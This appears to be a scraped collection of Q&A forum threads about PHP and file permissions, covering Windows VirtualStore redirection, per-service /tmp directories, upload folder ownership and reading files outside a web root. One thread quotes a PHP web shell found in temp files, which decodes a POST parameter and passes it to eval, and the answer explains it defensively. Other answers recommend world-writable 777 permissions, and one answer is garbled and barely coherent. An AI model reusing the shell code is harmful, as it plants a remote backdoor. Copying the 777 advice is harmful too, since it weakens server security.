I have a REALLY strange thing happening! When I view a file (within the "Program Files (x86)" folder tree) in my file manager it has one content, but when I retrieve it through PHP CLI script using file_get_contents() it has different content (with some additional lines I added through the script earlier) - except if I run the CLI script in a prompt with admin rights, then I see the same content. How on earth is it possible that the same file can have different content based on the permissions of the user accessing the file? Is that really possible, and if so where can I find more information on how it works? I've never heard of such a thing in my 25+ years of computing and programming experience...
I have quatro-checked that the path is the same and checked in all kinds of ways that there isn't something else playing a trick on me - but I just can't find any possible explanations!
I'm running Windows 10.
32-bit applications that do not have a requestedExecutionLevel node in their manifest are assumed to be UAC-unaware and if they try to write to a privileged location in the file system or registry (when the process is not elevated) the write operation is virtualized. Virtualized files are stored in %LocalAppData%\VirtualStore.
Manually delete the file in the virtual store and then edit the ACL/security of the file if you need to write to it from your script as a standard user...
Related
Ubuntu creates a separate /tmp directory for each user, so when Apache asks for /tmp it actually gets /tmp/systemd-private-654e145185f84f6ba097649873c88a9c-apache2.service-uUyzNh/tmp. (That code is different each time.) This is generally a good thing, but it’s annoying me now.
I want to create a bunch of PDF files (using TCPDF in PHP) in /tmp, then use shell_exec() in PHP to run the pdfunite script to create a single output PDF, then load that PDF into memory to serve it to the browser. My problem is that the pdfunite script doesn’t work, which I presume is because it’s not seeing the same path as the files are actually in.
Does PHP’s shell_exec() run code as the Apache user (www-data)? If so, I would assume that it would see the same /tmp dir, but in that case the pdfunite script should work. Is there a sensible workaround here, other than using a different directory and doing the cleanup myself?
This may sound like a pretty basic question, but I'm a bit stumped on what constitutes as "reading" a file, and "executing" a file.
For example:
User 1 buys a ticket from an online website, and wants to view the ticket (as a jpeg), which is displayed on the website.
Is this considered to be "reading" the folder? or is this actually executing the folder?
If the user permissions is set to "read only," that means the user CAN access the file via an action on the website(in this case, an image of their purchased ticket), but cannot access the file via direct url link right? Such as, www.exampletickets.com/user1/tickets
Folder Permissions:
Execute -> Actually enter that folder but not be
able to read it's contents, see what files are located there.
Read -> Be Able To Read Folder Contents
Write -> Edit folders data. delete or create new files/folders inside it and etc
File Permissions:
Execute -> if it's script like index.php run it to get data from it
Read -> if it's text file like index.html or index.php be able to read it
Write -> ability to change its data
As for security, this permissions are only an issue when your server is accessible by other (not from your team) users and this was mainly happening when people where using hosting services where they were not getting dedicated operating system but there was one operating system and all the users where uploading their data there. So if not correctly secured, they could view and edit each others source codes.
Today as usual you get dedicated server, with more security tools and operating system which is accessible only by you and no one else (virtualization).
So you don't need to worry that someone will view or change your data as you are the only one who has access to that server.
The webserver (apache, nginx,...) will serve any image files them by reading them, not executing them - same for any other files - regardless if accessed directly or not.
Also, the Linux file permission is given from the machine itself - here, the user will be the user running the webserver instance - usually a linux user named like "www-data". So it does not have anything related to your website's user.
For more information (what are the perfect file and directory permission for your websites ?) -> https://serverfault.com/questions/345833/what-are-perfect-unix-permissions-for-usual-web-project-directories
I have noticed that our temp directory has a number of what appear to be temporary files with names like phpA3F9.tmp
Looking into the contents I find a number followed by some PHP code, the following code appears in several files
9990000
<?php
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); #eval("\$safedg = $xsser;"); } ?>
This appears to be an attack attempt, but I presume it relies on the attacker being able to execute the code in the tmp folder.
Can anybody explain what is going on here? What are the risks? How do these files get into the tmp folder? And how do I stop them?
I don't know if it is relevant but we are running PHP 5.5 on IIS
Short story: your server may have already been compromised.
Those are PHP shells - mostly harmless where they are, but if they get into your web root, they'll allow an attacker to execute any arbitrary code on your server.
The key parts to understanding the shell are:
$xsser=base64_decode($_POST['z0']);
#eval("\$safedg = $xsser;");
It accepts any code at all from a $_POST variable, base64_decodes it, and then runs it through eval while suppressing any errors.
It's possible that they're being uploaded through a form on your site, and getting dumped in the temp folder as an intermediate step, with the hope that they would get moved into a web-accessible location. The other option is that there's already a shell or rootkit on your server, and it's putting those files in any writable folders that it can find.
So what to do about it? Check your server logs - if you see any successful connections to a script that you don't recognize, you may be compromised. Look for any upload forms on your site, and lock them down (require user authentication, etc.), and then if you're certain that you're compromised, don't bother trying to clean it. Spin up a new server, migrate your clean code, important files, and data to the clean server.
So I created a couple of directories and files with FTP, thus the owner is the username I use to login to the server. Now I'd like to allow users of the website to upload images to those directories. Unfortunately for the website to store images, it should be owned by Apache. How can I fix this? I've been reading around on this but can't directly find an answer.
I don't have SSH, so I guess all command-line-things are not applicable for me.
Edit
I tried to then make the folders again using apache, but now ofcourse I can't write any files using ftp into those directories.
Provided that at least the one directory is writeable by the apache user (lets call this directory 'writeabledir', it may be your root dir '/'), you must delete the folders you created via ftp and create a php script to create the directories you need.
If for example you want a directory called users and inside it another directory called upload
Create file makedirs.php on your server.
<?php
$oldumask = umask(0);
mkdir("writeabledir/users/upload",0777,true); // or even 01777 so you get the sticky bit set
umask($oldumask);
?>
Now run your makedirs.php once, by calling your.serv.er/makedirs.php on your browser
EDIT:
If you don't want to delete and recreate your directories,you could always try to change file permissions from ftp.
For exampe with FileZilla, just right click on the desired folder and set permissions to 777. If your ftp user does not have permission to do this, then there is no other way, except from asking an administrator to do this for you.
EDIT2:
Added umask to ensure that folders created by apache are writeable by everyone. (taken from http://us3.php.net/manual/en/function.mkdir.php#1207 )
Friend looks I work in php, some versions change the way of solution, however the most common is already that you want to store it would be necessary to create a database and import it to esu code that also serves to some images you want to come place, plus the wisest thing to do and you create a database with the fields necessary for its realization, import, put in a file directory of your schedule, you also advise using aptana Studio 3 greatly facilitates the creation of codes among many things and low xampp it already comes with apache integrated in one place will help you a lot any questions on installation just look at youtube he will describe
I was reading some posts about how to include files outside php root (Apache root). I guess only reading a file is a easier task, may be done with the same solution. But I do not intent to put php or any other script file outside my document root (right now is /Library/WebServer/Documents/), I wish to keep only one root with usual configurations.
But any file outside root is not "visible", it's like my all HD were made just by the root. Php did not return permissions error, it returns file don't exists (or is not a directory error). Is a good security practice, but make my scripts blind! I have a small Intranet an one task I wish to do is to read Safari's favorites file (Bookmarks.plist), also I wish to make a photo viewer, etc.
So I just want to read those files. Is there some hack for this?
EDIT: I was using file_get_contents. Following suggestions, I tried include that stops in permissions issues (probably owner issue). I did a test with a simple file in a Volume (an external HD) and it included just fine. However, I'm thinking in how to deal with data, you know, I was expecting to read the XML to work on it...
EDIT 2: file_get_contents is working with a file in an external HD, so the problem seams to be about permissions/owner file. The info window shows the same users for both files: me, staff and everyone with at least read permission. Maybe there is some "hidden" user... any hacker around?